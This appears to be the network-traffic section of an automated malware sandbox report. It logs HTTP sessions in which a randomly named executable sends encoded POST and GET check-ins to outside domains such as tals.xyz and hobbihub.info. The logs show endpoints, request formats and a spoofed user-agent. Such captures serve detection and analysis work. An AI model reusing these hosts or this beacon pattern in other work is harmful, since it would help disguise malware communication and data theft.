                                                    Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                    Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>sipdontshoot.net is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
                                                    Nov 21, 2024 16:18:27.090663910 CET224INData Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62
                                                    Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>sipdontshoot.net</h1><h2>is a totally awesome idea still bein
                                                    Nov 21, 2024 16:18:27.090706110 CET1236INData Raw: 67 20 77 6f 72 6b 65 64 20 6f 6e 2e 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 27 62 69 67 27 3e 43 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                    Data Ascii: g worked on.</h2><p class='big'>Check back later.</p><form action='https://www.hover.com/domains/results' method='get'><input name='source' type='hidden' value='parked'><input name='q' placeholder='Find a domain for your own great idea.'
                                                    Nov 21, 2024 16:18:27.090794086 CET | 1236 | IN | Data Raw: 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 59 6f 75 72 20 41 63 63 6f 75 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6e 61 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 27 73 6f 63 69 61 6c 27 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 3c 61
                                                    Data Ascii: source=parked">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform
                                                    Nov 21, 2024 16:18:27.090828896 CET | 1236 | IN | Data Raw: 33 32 2c 32 39 2e 32 38 37 31 36 20 2d 35 2e 37 36 37 37 33 2c 2d 30 2e 31 38 32 36 35 20 2d 31 31 2e 31 39 33 33 31 2c 2d 31 2e 37 36 35 36 35 20 2d 31 35 2e 39 33 37 31 36 2c 2d 34 2e 34 30 30 38 33 20 2d 30 2e 30 30 34 2c 30 2e 31 34 36 36 33
                                                    Data Ascii: 32,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.6
                                                    Nov 21, 2024 16:18:27.090867043 CET | 1236 | IN | Data Raw: 30 20 2d 31 30 35 2e 35 74 30 2e 35 20 2d 37 36 2e 35 74 2d 30 2e 35 20 2d 37 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 33 20 2d 39 36 2e 35 74 31 30 20 2d 31 30 33 74 31 38 2e 35 20 2d 37 31 2e 35 71 32 30 20 2d 35 30 20 35 38 20 2d 38 38 74 38 38
                                                    Data Ascii: 0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t105.5 0t96.5 3t103 10t71.5 18.5q50 20 88 58t58 88q11 29 18.5 71.5t10 103t3 96.5t0 105.5t-0.5 7
                                                    Nov 21, 2024 16:18:27.090895891 CET | 82 | IN | Data Raw: 2d 34 31 37 31 33 33 38 2d 34 33 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: -4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.5 | 49989 | 13.248.169.48 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:32.802555084 CET | 771 | OUT | POST /stx5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.tals.xyz
                                                    Referer: http://www.tals.xyz/stx5/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 76 6b 6e 47 63 49 4d 69 30 73 36 47 76 77 53 5a 36 36 41 50 47 73 67 44 47 6e 37 77 42 54 41 79 6d 2b 38 7a 65 43 63 77 4b 49 68 70 34 72 36 38 6c 71 50 58 7a 58 4e 61 44 63 4f 49 33 37 4f 31 45 67 53 62 73 70 36 72 79 47 54 34 66 76 76 4b 48 6b 41 37 6b 61 61 66 64 46 78 43 6d 2f 45 62 76 6a 7a 76 4a 4b 6c 63 4c 36 54 6b 75 73 55 63 4d 4c 4e 48 42 47 6b 46 55 72 6b 53 77 74 42 2f 6e 2f 42 4c 44 51 72 71 4a 77 2f 2f 58 71 6c 6d 66 52 42 77 69 4e 65 41 56 37 47 4a 50 4d 6c 59 6f 76 30 35 61 71 4b 6d 4c 44 61 6a 33 6a 30 6a 63 41 6e 5a 6f 4f 67 64 68 44 4c 36 5a 35 62 66 72 66 6a 55 37 4e 6f 3d
                                                    Data Ascii: StWXF0Jx=vknGcIMi0s6GvwSZ66APGsgDGn7wBTAym+8zeCcwKIhp4r68lqPXzXNaDcOI37O1EgSbsp6ryGT4fvvKHkA7kaafdFxCm/EbvjzvJKlcL6TkusUcMLNHBGkFUrkSwtB/n/BLDQrqJw//XqlmfRBwiNeAV7GJPMlYov05aqKmLDaj3j0jcAnZoOgdhDL6Z5bfrfjU7No=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.5 | 49990 | 13.248.169.48 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:35.477149963 CET | 791 | OUT | POST /stx5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.tals.xyz
                                                    Referer: http://www.tals.xyz/stx5/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 76 6b 6e 47 63 49 4d 69 30 73 36 47 67 77 69 5a 39 71 38 50 53 38 67 45 62 58 37 77 49 7a 41 2b 6d 2b 77 7a 65 44 59 67 4b 36 56 70 34 50 2b 38 6b 6f 33 58 30 58 4e 61 4d 38 4f 4a 76 62 4f 75 45 67 57 74 73 73 43 72 79 47 33 34 66 75 66 4b 47 55 38 38 69 4b 61 64 46 31 78 41 70 66 45 62 76 6a 7a 76 4a 4b 78 32 4c 36 4c 6b 76 66 4d 63 4e 71 4e 45 4c 6d 6b 43 58 72 6b 53 30 74 41 30 6e 2f 42 35 44 52 47 42 4a 79 33 2f 58 72 56 6d 65 46 74 7a 6f 4e 65 43 66 62 48 6e 47 65 45 56 71 2b 41 4c 51 4c 7a 31 4b 44 47 65 37 31 46 4a 47 69 76 78 37 75 4d 6c 78 51 44 4e 49 4a 36 32 78 38 7a 6b 6c 61 2b 4c 35 57 2b 30 75 63 76 75 51 4a 48 4f 42 65 44 41 4e 62 2b 5a
                                                    Data Ascii: StWXF0Jx=vknGcIMi0s6GgwiZ9q8PS8gEbX7wIzA+m+wzeDYgK6Vp4P+8ko3X0XNaM8OJvbOuEgWtssCryG34fufKGU88iKadF1xApfEbvjzvJKx2L6LkvfMcNqNELmkCXrkS0tA0n/B5DRGBJy3/XrVmeFtzoNeCfbHnGeEVq+ALQLz1KDGe71FJGivx7uMlxQDNIJ62x8zkla+L5W+0ucvuQJHOBeDANb+Z


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.5 | 49991 | 13.248.169.48 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:38.147913933 CET | 1808 | OUT | POST /stx5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.tals.xyz
                                                    Referer: http://www.tals.xyz/stx5/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 76 6b 6e 47 63 49 4d 69 30 73 36 47 67 77 69 5a 39 71 38 50 53 38 67 45 62 58 37 77 49 7a 41 2b 6d 2b 77 7a 65 44 59 67 4b 36 74 70 34 61 71 38 6b 4a 33 58 31 58 4e 61 42 63 4f 4d 76 62 50 32 45 67 75 78 73 73 47 37 79 45 2f 34 66 49 72 4b 4f 47 59 38 73 4b 61 64 4d 56 78 46 6d 2f 45 4b 76 6a 6a 72 4a 4b 68 32 4c 36 4c 6b 76 59 30 63 45 62 4e 45 4e 6d 6b 46 55 72 6b 65 77 74 42 54 6e 2f 5a 70 44 52 79 33 4a 43 58 2f 5a 72 46 6d 63 77 42 7a 31 39 65 45 63 62 48 4a 47 65 4a 56 71 2b 74 77 51 4c 47 75 4b 42 47 65 35 77 77 67 56 32 76 4f 34 2b 6f 6d 36 52 33 36 52 2b 69 45 32 39 54 7a 6b 4b 65 78 37 69 2f 61 6a 73 58 7a 5a 6f 4f 61 59 70 58 34 46 65 36 4e 35 36 55 72 55 74 70 41 57 57 72 71 6e 5a 6e 58 66 74 4c 79 58 74 4d 31 37 37 51 2f 4d 6f 31 4a 62 58 61 35 6f 6c 6a 59 76 32 2f 38 63 6a 37 65 36 39 46 4d 35 4c 56 4f 2f 43 6c 63 38 6f 6c 62 59 7a 65 73 49 64 7a 68 57 7a 41 50 76 4d 2b 6b 56 6c 79 34 71 6b 77 68 4d 47 47 58 46 32 65 67 65 31 55 4f 55 75 51 62 4d 49 74 44 64 [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=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 [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.5 | 49992 | 13.248.169.48 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:40.810096025 CET | 523 | OUT | GET /stx5/?zfI=jXEDeV4Xp62&StWXF0Jx=imPmf4gI1srj4STUrrMqNbgzS3ndO2Vfzd18ejlEFaVa4JSUkoHJ3l86KKOOva+7SWLQrsvslnf4fofCRXFAlseOCWBGmtkXklnnJa1INqnCq9NgN4lUNFEyHKg1xfk7mg== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:41.990622997 CET | 412 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 21 Nov 2024 15:18:41 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 272
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 66 49 3d 6a 58 45 44 65 56 34 58 70 36 32 26 53 74 57 58 46 30 4a 78 3d 69 6d 50 6d 66 34 67 49 31 73 72 6a 34 53 54 55 72 72 4d 71 4e 62 67 7a 53 33 6e 64 4f 32 56 66 7a 64 31 38 65 6a 6c 45 46 61 56 61 34 4a 53 55 6b 6f 48 4a 33 6c 38 36 4b 4b 4f 4f 76 61 2b 37 53 57 4c 51 72 73 76 73 6c 6e 66 34 66 6f 66 43 52 58 46 41 6c 73 65 4f 43 57 42 47 6d 74 6b 58 6b 6c 6e 6e 4a 61 31 49 4e 71 6e 43 71 39 4e 67 4e 34 6c 55 4e 46 45 79 48 4b 67 31 78 66 6b 37 6d 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zfI=jXEDeV4Xp62&StWXF0Jx=imPmf4gI1srj4STUrrMqNbgzS3ndO2Vfzd18ejlEFaVa4JSUkoHJ3l86KKOOva+7SWLQrsvslnf4fofCRXFAlseOCWBGmtkXklnnJa1INqnCq9NgN4lUNFEyHKg1xfk7mg=="}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.5 | 49993 | 209.74.77.108 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:47.799268961 CET | 786 | OUT | POST /i5gf/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.hobbihub.info
                                                    Referer: http://www.hobbihub.info/i5gf/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 57 37 73 68 36 48 76 56 36 51 48 70 34 79 6e 2b 72 76 5a 6f 78 79 31 65 42 75 74 36 30 4e 73 59 56 64 35 4a 61 49 58 4e 33 64 55 52 74 2b 62 2b 57 4f 52 66 51 4e 65 68 76 69 53 67 56 33 7a 74 66 4f 41 2f 79 6d 6e 63 76 2b 58 4c 4c 66 78 52 78 43 55 6f 64 35 50 75 43 4a 41 56 35 76 68 54 58 48 72 44 62 61 57 42 39 57 73 45 4e 6e 4b 6f 43 2b 6b 73 41 63 78 33 52 61 70 50 57 73 73 72 35 69 37 70 43 49 47 51 32 61 6b 54 30 53 53 46 67 48 7a 49 4f 30 67 43 33 32 2b 50 6c 47 41 76 34 6a 51 68 78 44 42 50 5a 76 55 38 59 6e 79 4f 4b 68 51 2b 42 79 37 68 2f 32 54 53 32 6e 2f 35 45 79 71 59 2f 54 6f 3d
                                                    Data Ascii: StWXF0Jx=W7sh6HvV6QHp4yn+rvZoxy1eBut60NsYVd5JaIXN3dURt+b+WORfQNehviSgV3ztfOA/ymncv+XLLfxRxCUod5PuCJAV5vhTXHrDbaWB9WsENnKoC+ksAcx3RapPWssr5i7pCIGQ2akT0SSFgHzIO0gC32+PlGAv4jQhxDBPZvU8YnyOKhQ+By7h/2TS2n/5EyqY/To=
                                                    Nov 21, 2024 16:18:49.052392006 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:48 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.5 | 49994 | 209.74.77.108 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:50.468961000 CET | 806 | OUT | POST /i5gf/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.hobbihub.info
                                                    Referer: http://www.hobbihub.info/i5gf/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 57 37 73 68 36 48 76 56 36 51 48 70 36 52 2f 2b 70 4d 78 6f 77 53 31 52 4f 4f 74 36 68 39 73 55 56 64 31 4a 61 4a 44 6a 30 72 45 52 73 62 66 2b 58 4d 70 66 64 74 65 68 38 69 54 71 4e 58 7a 6d 66 4f 64 43 79 6b 6a 63 76 36 2f 4c 4c 63 6c 52 78 52 38 72 63 70 50 6f 63 70 41 74 6d 2f 68 54 58 48 72 44 62 61 44 75 39 57 30 45 4e 33 36 6f 41 66 6b 6a 4a 38 78 30 57 61 70 50 41 73 73 76 35 69 37 50 43 4a 61 2b 32 65 55 54 30 53 43 46 68 57 7a 50 48 30 68 4c 70 47 2f 74 31 6e 6c 39 30 41 51 41 78 43 4e 53 5a 2b 6f 38 51 78 44 6b 51 44 59 57 53 53 58 5a 76 6c 62 6c 6e 58 65 51 65 52 36 6f 68 45 39 75 48 5a 55 7a 53 59 4b 74 75 70 4d 62 35 32 6e 37 72 48 34 68
                                                    Data Ascii: StWXF0Jx=W7sh6HvV6QHp6R/+pMxowS1ROOt6h9sUVd1JaJDj0rERsbf+XMpfdteh8iTqNXzmfOdCykjcv6/LLclRxR8rcpPocpAtm/hTXHrDbaDu9W0EN36oAfkjJ8x0WapPAssv5i7PCJa+2eUT0SCFhWzPH0hLpG/t1nl90AQAxCNSZ+o8QxDkQDYWSSXZvlblnXeQeR6ohE9uHZUzSYKtupMb52n7rH4h
                                                    Nov 21, 2024 16:18:51.737951040 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:51 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.5 | 49995 | 209.74.77.108 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:53.126828909 CET | 1823 | OUT | POST /i5gf/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.hobbihub.info
                                                    Referer: http://www.hobbihub.info/i5gf/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 57 37 73 68 36 48 76 56 36 51 48 70 36 52 2f 2b 70 4d 78 6f 77 53 31 52 4f 4f 74 36 68 39 73 55 56 64 31 4a 61 4a 44 6a 30 72 4d 52 73 70 58 2b 58 74 70 66 63 74 65 68 6e 43 54 6e 4e 58 7a 33 66 4f 56 47 79 6b 75 68 76 38 37 4c 45 65 39 52 68 77 38 72 53 5a 50 6f 47 4a 41 57 35 76 68 6a 58 44 48 50 62 61 54 75 39 57 30 45 4e 78 2b 6f 4f 65 6b 6a 46 63 78 33 52 61 70 44 57 73 73 48 35 68 4c 78 43 4a 65 41 32 74 63 54 30 79 79 46 6d 6b 62 50 66 6b 68 4a 6f 47 2f 4c 31 6e 59 6a 30 41 4d 79 78 43 34 61 5a 35 45 38 41 6e 6a 6e 43 51 59 4e 45 43 62 70 69 6b 66 5a 6d 52 43 31 57 43 4f 69 72 6e 52 6f 43 4c 55 39 58 73 50 76 74 72 4a 58 76 48 76 4e 37 68 42 74 70 59 67 45 45 70 76 61 70 4c 71 76 6c 45 42 76 4c 35 6b 51 57 54 47 6d 38 49 70 6f 73 78 59 6f 42 64 50 4e 70 6b 76 62 2b 55 67 72 6c 6f 78 66 6a 43 46 73 42 39 2f 46 36 4b 78 58 42 73 67 42 47 72 6f 4f 63 36 53 73 57 42 73 33 50 42 6f 6e 56 50 64 47 6a 56 62 57 65 41 49 42 58 54 48 66 6d 66 38 